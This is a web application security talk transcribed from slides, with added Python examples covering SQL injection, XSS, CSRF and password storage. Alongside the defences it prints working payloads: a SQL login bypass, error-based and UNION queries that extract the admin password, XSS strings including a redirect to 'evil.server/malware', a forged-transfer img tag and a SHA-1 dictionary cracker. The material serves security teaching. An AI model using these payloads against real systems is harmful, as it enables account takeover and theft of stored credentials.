Web Application Security
by Lee Christensen
@tifkin_
Thanks to our Sponsors!
Who is this guy?
• Lee Christensen
• Penetration Tester and Security Consultant
• Computer Security Enthusiast
• Web Application Security
• Browser Security
• Developer (at heart…)
• Almost a Weber State graduate
Who are you?
Where are we going?
• Attacker techniques and defenses (Application level)
• Awareness – NON-COMPREHENSIVE
• Injection Attacks
• SQL injection
• Cross-site scripting
• Cross Site Request Forgery
• Password Storage
• Quick note on permission
Injection Attacks
DEMO
SQL injection attacks and techniques
Input: PASSWORD
SELECT user_id
FROM phorum_users
WHERE username = 'admin'
AND password = 'PASSWORD'
Input: ' OR 1=1#
SELECT user_id
FROM phorum_users
WHERE username = 'admin'
AND password = '' OR 1=1#'
The injected quote closes the string literal, OR 1=1 makes the WHERE clause true for every row, and # (the MySQL line comment) discards the application's trailing quote, so the query returns a user_id without a valid password.
Error-based extraction (MySQL): the duplicate-key trick below uses FLOOR(RAND(0)*2) with GROUP BY so that the server reports a "Duplicate entry" error whose text contains the admin's password column value, wrapped in >>> and <<<.
BLAH' AND
(SELECT 1
FROM
(SELECT COUNT(*),
CONCAT(
'>>>',
(SELECT password
FROM phorum_users
WHERE username = 'admin')
,'<<<',
FLOOR(RAND(0)*2))x
FROM phorum_users
GROUP BY x)a)#'
Defenses
• “Give me parameterized SQL, or give me death” – Jeff Atwood
• No concatenating strings!
• Server-side input validation
• Whitelist Acceptable Characters
• Avoid blacklists where possible
• Use an Object Relational Mapper (ORM); its raw-query escape hatches still need parameters
• NO CONCATENATING STRINGS!
$db = new PDO('mysql:host=host;dbname=<DB>',
              'DB_USER',
              'DB_PASSWORD');
// Prepare once; the values are bound separately and never spliced into the SQL text
$stmt = $db->prepare('SELECT user_id
                      FROM phorum_users
                      WHERE username = :username
                      AND password = :password');
$stmt->bindParam(':username', $username, PDO::PARAM_STR);
$stmt->bindParam(':password', $password, PDO::PARAM_STR);
$stmt->execute();
$user_id = $stmt->fetchColumn();   // false when no row matched
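Added example, not from the deck: the login query from the slides run against an in-memory SQLite copy of phorum_users (constructed, one admin row), first built by string concatenation as on slide 8 and then with bound parameters as in the PDO code above. It also shows a UNION payload turning the same login form into a data-extraction oracle, and that the slide's # comment marker is MySQL-specific (SQLite needs --), so the payload has to be adapted to the target DBMS. Table and account contents are assumptions made so the code runs offline.

```python
import sqlite3

# Constructed sample data, not from the original deck: a one-row copy of the
# phorum_users table used in the slides.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE phorum_users ("
               "user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to mirror the slide's query; a real table
    # holds a salted, slow hash (see the Password Storage section).
    db.execute("INSERT INTO phorum_users (username, password) "
               "VALUES ('admin', 'correct horse battery staple')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The deck's query built by string concatenation: deliberately injectable."""
    sql = ("SELECT user_id FROM phorum_users "
           f"WHERE username = '{username}' AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Same query with bound parameters: the values never touch the SQL text."""
    row = db.execute(
        "SELECT user_id FROM phorum_users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The slide's payload uses '#' as the comment marker, which is MySQL syntax.
# SQLite only understands '--', so that form is used here; the technique is
# identical: close the string, add a tautology, comment out the trailing quote.
BYPASS = "' OR 1=1--"

# A UNION payload makes the login form leak data: the query only returns
# user_id, but the attacker decides what that single column contains.
EXFIL = "' UNION SELECT password FROM phorum_users WHERE username = 'admin'--"


def mysql_comment_payload_fails_here(db):
    """Comment syntax is DBMS-specific: '#' is a syntax error in SQLite."""
    try:
        login_vulnerable(db, "admin", "' OR 1=1#")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass    ->", login_vulnerable(db, "admin", BYPASS))
    print("vulnerable, exfil     ->", login_vulnerable(db, "nobody", EXFIL))
    print("parameterized, bypass ->", login_parameterized(db, "admin", BYPASS))
    print("parameterized, real   ->",
          login_parameterized(db, "admin", "correct horse battery staple"))
    print("'#' payload errors in SQLite:", mysql_comment_payload_fails_here(db))
```

The parameterized version returns None for the bypass string because the driver sends it as a value compared against the password column, not as SQL; the same input against the concatenated query logs in as user_id 1, and the UNION string returns the admin password instead of an id.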
Cross-site Scripting
<script>alert(1)</script>
What is XSS?
• Injected client side content (usually JavaScript*)
• Extremely Prevalent
• Some of the types
• Reflective
• Persistent (Stored)
• DOM-based
• Mutation XSS (mXSS)
• Flash-based XSS
Reflective XSS
• welcome.jsp?name=Bob
• Welcome Bob!
• welcome.jsp?name=<blink>Bob</blink>
• Welcome <blink>Bob</blink>
R.I.P. <blink> - Aug. 6, 2013
• welcome.jsp?name=<script>document.location="evil.server/malware"</script>
• Welcome <script>document.location="evil.server/malware"</script>!
Vulnerable Code
Welcome $name
Persistent XSS
• XSS attack payload is stored
• Database
• Session variable
• Cookie
• File
• Image metadata
Demo
Cross-site scripting (XSS)
How XSS exploits clients
• Session hijacking
• (HttpOnly on cookies stops script from reading the session cookie, but injected script can still send requests as the user)
• Malware
• Stealing Credentials
• Internal network scanning
• Data Theft
• Impersonating Users
• Bypass CSRF Defenses
• Key loggers
XSS Defenses
• Contextual Output Encoding
Vulnerable Code                         Resulting Output
<div>INPUT</div>                        <div><script>alert(1)</script></div>
<input value="INPUT">                   <input value="" onfocus="alert(1)">
<script>var a = "INPUT";</script>       <script>var a = "" + alert(1) + "";</script>
Contextual Output Encoding
Examples
Encoded Code                                      Resulting Output
<div>encodeForHtml(INPUT)</div>                   <div>&lt;script&gt;alert(1)&lt;/script&gt;</div>
<input value="encodeForHtmlAttr(INPUT)">          <input value="&quot;&#x20;onfocus&#x3D;&quot;alert(1)">
<script>var a = "encodeForJS(INPUT)";</script>    <script>var a = "\x22\x20\x2b\x20alert\x281\x29\x20\x2b\x20\x22";</script>
The encoder is chosen by where the value lands (HTML body, quoted attribute, JavaScript string); an encoder for the wrong context does not help.
Contextual Output Encoding
Examples
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
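Added example, not from the deck or from the OWASP encoder projects: minimal encoders for the three contexts in the tables above, applied to the three templates from the slides, plus the failure case the tables imply but do not show, an HTML-body encoder used in an unquoted attribute. The encoder names and payloads are the slides'; the implementations are assumptions written for this page (the real OWASP encoders handle more cases, such as non-BMP characters and HTML5 rules).

```python
import html
import re

_SAFE = re.compile(r"[A-Za-z0-9]")


def encode_for_html(s):
    """HTML body context: the five significant characters become entities."""
    return html.escape(s, quote=True)


def encode_for_html_attr(s):
    """Quoted attribute context: every non-alphanumeric becomes &#xHH;, so the
    value can neither close the quote nor start a new attribute."""
    return "".join(c if _SAFE.match(c) else f"&#x{ord(c):02x};" for c in s)


def encode_for_js(s):
    """JavaScript string context: \\xHH for Latin-1, \\uHHHH otherwise, so the
    value can neither terminate the string literal nor the <script> block."""
    out = []
    for c in s:
        if _SAFE.match(c):
            out.append(c)
        elif ord(c) < 0x100:
            out.append(f"\\x{ord(c):02x}")
        else:
            out.append(f"\\u{ord(c):04x}")
    return "".join(out)


# The three templates from the slides, each paired with the encoder for its context.
def render_div(user_input):
    return f"<div>{encode_for_html(user_input)}</div>"


def render_input(user_input):
    return f'<input value="{encode_for_html_attr(user_input)}">'


def render_script(user_input):
    return f'<script>var a = "{encode_for_js(user_input)}";</script>'


# Wrong encoder for the context: HTML-body encoding inside an UNQUOTED attribute.
# Space and '=' survive untouched, so the input grows new event-handler attributes.
def render_input_unquoted_wrong(user_input):
    return f"<input value={encode_for_html(user_input)}>"


# Constructed payloads, one per context (the first three are the slides' own).
PAYLOADS = {
    "div": "<script>alert(1)</script>",
    "attr": '" onfocus="alert(1)',
    "js": '" + alert(1) + "',
    "unquoted": "x onfocus=alert(1) autofocus",
}

if __name__ == "__main__":
    print(render_div(PAYLOADS["div"]))
    print(render_input(PAYLOADS["attr"]))
    print(render_script(PAYLOADS["js"]))
    print(render_input_unquoted_wrong(PAYLOADS["unquoted"]))
```

The last line of output is the one to study: the value is "encoded", yet the browser sees three attributes. Quoting the attribute and using the attribute encoder is what makes the second template safe, not encoding on its own.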
XSS Defenses
• Contextual Output Encoding
• OWASP Java Encoder Project
• ESAPI (PHP, Coldfusion, Python)
• Anti-XSS (.NET)
• Server side input validation
• Use a whitelist where possible
• HTML Sanitizers (when a subset of HTML must be accepted)
• AntiXSS/HTML Agility Pack (.NET)
• OWASP Java HTML Sanitizer (Java)
• HTML Purifier/htmLawed (PHP)
• DOMPurify (JavaScript; in Node.js via jsdom)
XSS Defenses – continued
• Understand your framework's defenses
• @Model.name (Razor HTML-encodes output by default)
• ...but HTML encoding does not make a URL context safe: <a href="javascript&#x3A;alert(1)">Click Me!</a> still runs, because the browser decodes the entity before it parses the URL scheme
• Use a JavaScript MVC framework that supports templated views
• <div>{{user.name}}</div> (the template engine escapes the interpolated value)
• https://code.google.com/p/mustache-security/ documents how each client-side template language can still be abused
• Content Security Policy
Cross Site Request Forgery (CSRF)
What is CSRF?
• Also called "session riding": the victim's browser is made to send a request the attacker chose, and it attaches the victim's cookies automatically
• my.bank/transfer?amount=1000&to=1234
• <img src="my.bank/transfer?amount=1000&to=666">
• 4.5 million routers hacked via CSRF
• Places to be especially aware of
• Actions
• Account/Role Management
Demo
Privilege Escalation via CSRF
CSRF Defense
• Eliminate Cross-Site Scripting (XSS) first: script running on your origin can read the token and defeats every defense below
• Re-enter password for sensitive actions
• GET requests do NOT change server state
• Synchronizer-token pattern
1. A random token is generated and associated with the user's session
2. The token is included in each state-changing request made to the server
3. The server validates that the submitted token matches the one stored for that session
CSRF defenses in action
• CSRF Token
• Unique per user
session
• Sent on state-changing
requests
if(tokenInRequest == TokenOnServer)
Proceed
else
Error!
Example: ASP.NET MVC
Controller
[HttpPost]
[ValidateAntiForgeryToken]
public ActionResult DoSomething()
{
    // Do stuff
}
View
<div>
@using (Html.BeginForm())
{
    @Html.AntiForgeryToken()
    @* other form elements *@
}
</div>
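Added example, not from the deck: the three steps of the synchronizer-token pattern and the "CSRF defenses in action" check, as a framework-free Python sketch. The session store, cookie and form dictionaries stand in for the web framework and are assumptions; the point is that the token is random per session, travels in the form body rather than a cookie, and is compared against the victim's own session in constant time, so a forged request (no token) and a replayed token from the attacker's session are both rejected.

```python
import hmac
import secrets

# Constructed in-memory store standing in for the real session backend
# (assumption: one CSRF token per login session, regenerated at login).
SESSIONS = {}   # session_id -> {"user": ..., "csrf": token}


def start_session(user):
    """Step 1: log a user in with a fresh session id and a fresh random token bound to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """Step 2: the token travels in a hidden field of every state-changing form."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="amount"><input name="to"></form>')


def handle_transfer(cookies, form):
    """Step 3: compare the submitted token with the copy stored for THIS session.
    Returns (http_status, message)."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    # Constant-time compare so the token cannot be recovered byte by byte via timing.
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['to']} for {session['user']}"


def legitimate_request(sid):
    """The victim submits the bank's own form: cookie and matching token."""
    return handle_transfer({"session": sid},
                           {"csrf_token": SESSIONS[sid]["csrf"], "amount": "10", "to": "1234"})


def forged_request(sid):
    """The <img src=...> or auto-submitting form on the attacker's page: the browser
    attaches the victim's cookie, but the attacker cannot read or supply the token."""
    return handle_transfer({"session": sid}, {"amount": "1000", "to": "666"})


def cross_session_request(victim_sid, attacker_sid):
    """Attacker supplies a token from their OWN session: rejected because the server
    checks the token against the victim's session, not merely that some token exists."""
    return handle_transfer({"session": victim_sid},
                           {"csrf_token": SESSIONS[attacker_sid]["csrf"],
                            "amount": "1000", "to": "666"})


if __name__ == "__main__":
    victim, attacker = start_session("alice"), start_session("mallory")
    print(legitimate_request(victim))
    print(forged_request(victim))
    print(cross_session_request(victim, attacker))
```

Frameworks such as ASP.NET MVC's AntiForgeryToken do the same bookkeeping for you; what this sketch makes visible is why the check has to be per-session and why the token must never be sent only as a cookie (the browser would attach it to the forged request too).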
Password Storage
Hashing
• Potatoes + Frying Pan = Protection!
• One-way function
• sha1(password) = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
• sha1(salt + password)
• sha1(“A3dyUc” + “password”) =
e9d435577a819b718fea098a7f4b4b6c9e1963da
• sha1(“8DcPvd” + “password”) =
aa5f9e6c1f87b3520b08fb1540c3fa62cf2afb03
• Password + Salt = Sufficient?
Password Cracking
Leaked Hash: 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab
Guesses:
• sha1(password) => 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
• sha1(123456) => 7c4a8d09ca3762af61e59520943dc26494f8941b
• sha1(admin) => d033e22ae348aeb5660fc2140aec35850c4da997
• sha1(monkey) => ab87d24bdc7452e55738deb5f868e1f16dea5ace
• sha1(s3cr3t) => 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab
Demo
Password Cracking
Password Storage in the Real World
1) Do not limit the type of characters or length of user passwords
• Limiting passwords to protect against injection is doomed to failure
• Be wary of systems that allow unlimited password sizes (Django DoS, Sept. 2013)
• One exception: reject known weak passwords such as Password1!
2) Use a cryptographically strong credential-specific salt
• protect( [salt] + [password] );
• Use a 32- or 64-byte salt (actual size dependent on protection function)
• Do not depend on hiding, splitting, or otherwise obscuring the salt; it exists to make each hash unique, not to be secret
Leverage Keyed Functions
3a) Impose difficult verification on [only] the attacker (strong/fast)
• HMAC-SHA-256( [private key], [salt] + [password] )
• Protect this key as any private key using best practices
• Store the key outside the credential store
• Build the password-to-hash conversion as a separate web service (cryptographic isolation)
3b) Impose difficult verification on the attacker and defender (weak/slow)
• PBKDF2([salt] + [password], c=10,000,000); the iteration count is a cost knob: tune it so one verification takes tens of milliseconds on your hardware, and raise it as hardware gets faster
• Use PBKDF2 when FIPS certification or enterprise support on many platforms is required
• Use scrypt where resisting any/all hardware-accelerated attacks is necessary but enterprise support and scale is not
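Added example, not from the deck or the OWASP cheat sheet it summarises: the dictionary attack from the "Password Cracking" slides against unsalted SHA-1 (the wordlist is constructed; the hash values for "password" and "123456" are the ones shown on the slides), followed by storage that applies items 2, 3a and 3b together: a random per-credential salt, a slow PBKDF2 stretch, and an HMAC under a server-side key kept outside the credential store. The storage-string format, the iteration count and the key generated at import time are assumptions so the code runs stand-alone; in production the key comes from an HSM, KMS or a separate service, as item 3a says.

```python
import hashlib
import hmac
import secrets

# --- Offline guessing against unsalted SHA-1 (the "Password Cracking" slides) ---

# Constructed wordlist; the slides list the SHA-1 of each of these.
WORDLIST = ["123456", "admin", "monkey", "s3cr3t", "password"]


def crack_sha1(leaked_hex, wordlist):
    """Return the first candidate whose SHA-1 equals the leaked hash, else None.
    One SHA-1 per guess and no salt: a wordlist walk takes microseconds per entry,
    and without a salt one precomputed table serves every leaked hash."""
    for guess in wordlist:
        if hashlib.sha1(guess.encode()).hexdigest() == leaked_hex:
            return guess
    return None


# --- Salted, slow, keyed storage (items 2, 3a and 3b) ---

PBKDF2_ITERATIONS = 310_000   # assumption; tune to ~100 ms on your verification hardware
SALT_BYTES = 32               # item 2: 32- or 64-byte random salt per credential

# 3a: a server-side key kept OUTSIDE the credential store. Generated here only so
# the example runs; that is an assumption, not a recommendation.
SERVER_KEY = secrets.token_bytes(32)


def protect(password, salt, iterations=PBKDF2_ITERATIONS):
    """3b then 3a: slow PBKDF2 over salt+password, then HMAC under the server key.
    A dump of the table alone cannot be attacked offline without the key."""
    slow = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.new(SERVER_KEY, slow, hashlib.sha256).digest()


def hash_password(password):
    """Storage format (assumption): alg$iterations$salt_hex$hash_hex.
    The salt is stored in the clear; its job is uniqueness, not secrecy."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = protect(password, salt)
    return f"pbkdf2_sha256_hmac${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    alg, iters, salt_hex, hash_hex = stored.split("$")
    if alg != "pbkdf2_sha256_hmac":
        return False
    candidate = protect(password, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate, bytes.fromhex(hash_hex))


if __name__ == "__main__":
    # sha1("password") from the slides: cracked instantly.
    print(crack_sha1("5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8", WORDLIST))
    h1, h2 = hash_password("password"), hash_password("password")
    print("same password, different records:", h1 != h2)
    print("verify correct:", verify_password("password", h1),
          "verify wrong:", verify_password("Password", h1))
```

Storing the iteration count alongside the hash is what lets you raise it later: old records keep verifying with their recorded cost and can be re-hashed at the user's next successful login.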
Closing Thoughts
• Code with an attacker’s perspective
• Test your app
• Continue to learn
• Get Involved
• OWASP (Open Web Application Security Project)
• http://utahsec.org
Questions?
Thanks!
@tifkin_

More Related Content

What's hot

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kimjaxconf
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)securityEnrico Zimuel
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningSean Chittenden
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 

What's hot (20)

Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Onward15
Onward15Onward15
Onward15
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
 
iCloud keychain
iCloud keychainiCloud keychain
iCloud keychain
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Password (in)security
Password (in)securityPassword (in)security
Password (in)security
 
Dynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency PlanningDynamic Database Credentials: Security Contingency Planning
Dynamic Database Credentials: Security Contingency Planning
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 

Viewers also liked

End to end web security
End to end web securityEnd to end web security
End to end web securityGeorge Boobyer
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsFabio Lombardi
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin PartnersFabio Lombardi
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Fabien Potencier
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 

Viewers also liked (10)

End to end web security
End to end web securityEnd to end web security
End to end web security
 
Web security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutionsWeb security: OWASP project, CSRF threat and solutions
Web security: OWASP project, CSRF threat and solutions
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
DemoDay Berlin Partners
DemoDay Berlin PartnersDemoDay Berlin Partners
DemoDay Berlin Partners
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 
Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4Dependency injection in PHP 5.3/5.4
Dependency injection in PHP 5.3/5.4
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to SECURING WEB APPS

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.pptSul Haedir
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git RepoCliff Smith
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development PracticesBrandon Dove
 
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Andrea Hauser
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeAlexandre Morgaut
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeWim Godden
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
JWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesJWTs for CSRF and Microservices
JWTs for CSRF and MicroservicesStormpath
 

Similar to SECURING WEB APPS (20)

Tests
TestsTests
Tests
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.ppt
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development Practices
 
JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Web Application Penetration Testing - 101
Web Application Penetration Testing - 101Web Application Penetration Testing - 101
Web Application Penetration Testing - 101
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Hack through Injections
Hack through InjectionsHack through Injections
Hack through Injections
 
Django cryptography
